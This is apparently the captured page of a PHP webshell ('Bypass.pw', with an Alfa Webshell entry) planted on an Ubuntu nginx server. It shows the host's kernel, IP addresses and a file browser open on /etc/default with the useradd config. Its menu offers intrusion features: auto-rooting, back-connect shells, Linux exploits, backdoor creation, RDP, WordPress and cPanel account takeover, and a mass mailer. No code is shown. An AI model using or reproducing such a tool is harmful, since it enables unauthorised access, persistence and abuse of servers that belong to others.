Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
grub.d
[ DIR ]
drwxr-xr-x
apache-htcacheclean
556
B
-rw-r--r--
apport
149
B
-rw-r--r--
auditd
485
B
-rw-r--r--
console-setup
284
B
-rw-r--r--
cron
150
B
-rw-r--r--
cryptdisks
460
B
-rw-r--r--
dbus
297
B
-rw-r--r--
grub
1.51
KB
-rw-r--r--
iperf3
196
B
-rw-r--r--
keyboard
150
B
-rw-r--r--
locale
13
B
-rw-r--r--
mdadm
854
B
-rw-r--r--
motd-news
682
B
-rw-r--r--
networkd-dispatcher
152
B
-rw-r--r--
nginx
389
B
-rw-r--r--
open-iscsi
2.63
KB
-rw-r--r--
pmcd
1.54
KB
-rw-r--r--
pmfind
154
B
-rw-r--r--
pmie_timers
313
B
-rw-r--r--
pmlogger
1.76
KB
-rw-r--r--
pmlogger_farm
1.58
KB
-rw-r--r--
pmlogger_timers
653
B
-rw-r--r--
pmproxy
454
B
-rw-r--r--
pollinate
363
B
-rw-r--r--
rsync
2.01
KB
-rw-r--r--
ssh
133
B
-rw-r--r--
sysstat
284
B
-rw-r--r--
ufw
1.85
KB
-rw-r--r--
useradd
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : useradd
# Default values for useradd(8) # # The SHELL variable specifies the default login shell on your # system. # Similar to DSHELL in adduser. However, we use "sh" here because # useradd is a low level utility and should be as general # as possible SHELL=/bin/sh # # The default group for users # 100=users on Debian systems # Same as USERS_GID in adduser # This argument is used when the -n flag is specified. # The default behavior (when -n and -g are not specified) is to create a # primary user group with the same name as the user being added to the # system. # GROUP=100 # # The default home directory. Same as DHOME for adduser # HOME=/home # # The number of days after a password expires until the account # is permanently disabled # INACTIVE=-1 # # The default expire date # EXPIRE= # # The SKEL variable specifies the directory containing "skeletal" user # files; in other words, files such as a sample .profile that will be # copied to the new user's home directory when it is created. # SKEL=/etc/skel # # Defines whether the mail spool should be created while # creating the account # CREATE_MAIL_SPOOL=no
Close